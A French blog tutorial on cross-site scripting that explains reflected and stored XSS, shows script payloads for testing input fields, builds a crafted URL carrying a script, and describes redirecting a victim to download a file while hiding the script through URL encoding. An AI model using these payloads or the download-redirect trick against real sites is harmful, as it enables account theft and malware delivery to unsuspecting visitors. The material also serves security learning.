Faille XSS – Qu’est-ce que c’est et comment l’utiliser ? Notre tutoriel !

Faille XSS – C’est quoi ? – Comment l’utiliser ?

La Faille XSS ou Cross Site Scripting est l’une des failles les plus courantes sur les sites Web.

Cette faille peut être évitée, mais parfois les développeurs web n’y prêtent pas assez attention et ne nettoie pas ou ne vérifient pas leurs codes.

Cette faille existe dans les formulaires Web, les sections Commentaires ou partout où la saisie de texte est nécessaire / requis.

 

IMPACT DE LA FAILLE XSS

Il permet à l’attaquant d’injecter des scripts qui peuvent compromettre le site internet et mener à la divulgation d’informations confidentielles ou au vol de cookies qui peuvent finir par provoquer une usurpation de compte.

 

QUELQUES TERMES IMPORTANTS AVANT D’ALLER DE L’AVANT :

HTTP REQUEST : Assez simple à comprendre.

A chaque fois que vous lancez une page Web ou obtenez un fichier, votre navigateur fait une requête http dirigée vers le serveur du site internet.

Cette requête http est gérée par le serveur web et répond en conséquence.

PARAMETRES DE DEMANDE : Un peu plus complexe

C’est là que le script est injecté dans la plupart des sites faillibles  aux failles xss courantes.

Exemple = http://example.com/test.php?a=1&b=2 Dans cet exemple « a » et « b » sont des paramètres avec les valeurs respectives « 1 » et « 2 ».

Le script est le plus souvent injecté dans la valeur du paramètre.

TYPES DE FAILLES XSS

Faille REFLECTED OR NON-PERSISTANT XSS : Ce type de faille xss est assez courant.

Ce n’est pas très dangereux en soi, mais lorsqu’il est combiné à l’ingénierie sociale, il peut être mortel. Dans ce type de faille xss, la charge utile ou le script fait partie de la requête http ou de l’URL.

Rien n’est stocké en permanence sur le serveur web dans ce type de xss.

Il peut être utilisé pour cibler spécifiquement une personne.

Il se compose d’un lien de site internet de confiance mais le lien se compose de vecteur/script xss.

 

Faille XSS : Ce type de xss est le plus dangereux.

Dans ce type de faille xss, l’attaquant injecte un script qui reste stocké de façon permanente sur la page Web de sorte que lorsque quelqu’un visite cette page, le script malveillant est exécuté.

Cela peut faire beaucoup de dégâts.

Cette faille XSS peut aussi être utilisé pour défigurer le site web (nous en reparlerons plus tard).

TROUVER LES FAILLES XSS DANS LES SITES WEB

Nous avons donc maintenant une connaissance de base de XSS et nous allons aller un peu plus loin et apprendre comment identifier une faille XSS dans un site Web.

 

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Comme vous pouvez le voir sur la photo, le site contient une zone de saisie.

Donc, pour identifier la faille cela permet d’entrer un script simple dans la zone de saisie

<script>alert(« XSS found »)</script>

Ce script renvoie la réponse suivante et confirme qu’il y a une faille xss sur le site.

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Pour être sûr que nous essayons d’injecter un script de plus dans le champ de recherche et que nous puissions voir le résultat.

<script>prompt(« XSS found »)</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Ceci confirme la faille XSS.

C’est un type de xss réfléchi et maintenant la question est de savoir comment exécuter le script à partir de l’URL.

Nous allons maintenant analyser les requêtes HTTP faites par le navigateur lorsque nous injectons le script. Voici les paramètres de la recherche.

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Il y a un total de 4 paramètres.

Nous voyons que le script est injecté dans le paramètre « roll_number », donc si nous voulons que le script soit exécuté à partir d’une URL, nous allons devoir construire une URL comme celle-ci

Ainsi, en exécutant l’URL ci-dessus, notre script est également exécuté comme on peut le voir dans l’image. Nous pouvons exécuter n’importe quel script de cette façon.

http://www.example.com/find_result.php?submit=Result&m=98&roll_number= »><script>alert(« XSS+found+again »)</script>&s=147

UTILISER UNE FAILLE XSS POUR FAIRE TÉLÉCHARGER UN FICHIER À LA VICTIME

Ce sera facile une fois que vous aurez compris tout ce qui précède.

Dans l’URL que nous avons construit ci-dessus, si nous remplaçons ce script par le téléchargement de votre fichier commencera.

<script>document.location= »Lien de votre fichier »</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

L’avantage est que la victime pense que le fichier provient d’un site Web de confiance.

Vous pouvez encoder l’url pour cacher votre script dans l’url.

Plus d’informations sur Wikipédia sur les failles XSS :

https://fr.wikipedia.org/wiki/Cross-site_scripting

Tutoriel rédigé à des fins d’éducations afin de se prémunir contre se type d’attaque.

Cet article pourrait aussi vous intéresser, qui concerne les types d’attaques contre les site internet :

https://mastercheat.net/comment-les-hackers-font-pour-pirater-un-site-internet/

 

Laisser un commentaire